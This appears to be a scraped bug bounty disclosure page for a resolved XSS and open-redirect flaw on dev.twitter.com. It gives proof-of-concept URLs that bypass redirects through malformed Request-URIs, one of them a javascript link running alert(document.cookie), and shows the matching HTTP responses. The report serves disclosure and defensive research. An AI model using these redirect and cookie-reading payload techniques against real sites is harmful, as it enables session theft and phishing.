Loading HuntDB...

[dev.twitter.com] XSS and Open Redirect

Medium
X
X (Formerly Twitter)
Submitted None
Reported by bobrov

Vulnerability Details

Technical details and impact analysis

Description === XSS via Request-URI which requires user interaction. The vulnerability is caused by the difference in the Request-URI processing in the Location header and in the link on the page. By creating an incorrect port in the link on the Location header, you can block the redirection for the FireFox browser. Next, using the difference in the processing, generate a "javascript" link on the page. PoC: Open Redirect === Browsers: Chrome, FireFox, Opera ``` https://dev.twitter.com/https:/%5cblackfan.ru/ ``` HTTP Response: ```http HTTP/1.1 302 Found connection: close ... location: https:/\blackfan.ru ``` PoC: XSS === Browsers: FireFox Steps to reproduce: Open and click the link ``` https://dev.twitter.com//x:1/:///%01blocked:alert(document.cookie)/ ``` HTTP Response: ```http HTTP/1.1 302 Found connection: close ... location: //x:1/://dev.twitter.com/blocked:alert(document.cookie) ... <p>You should be redirected automatically to target URL: <a href="blocked:alert(document.cookie)">blocked:alert(document.cookie)</a>. If not click the link. ``` {F213436}

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Bounty

$1120.00

Submitted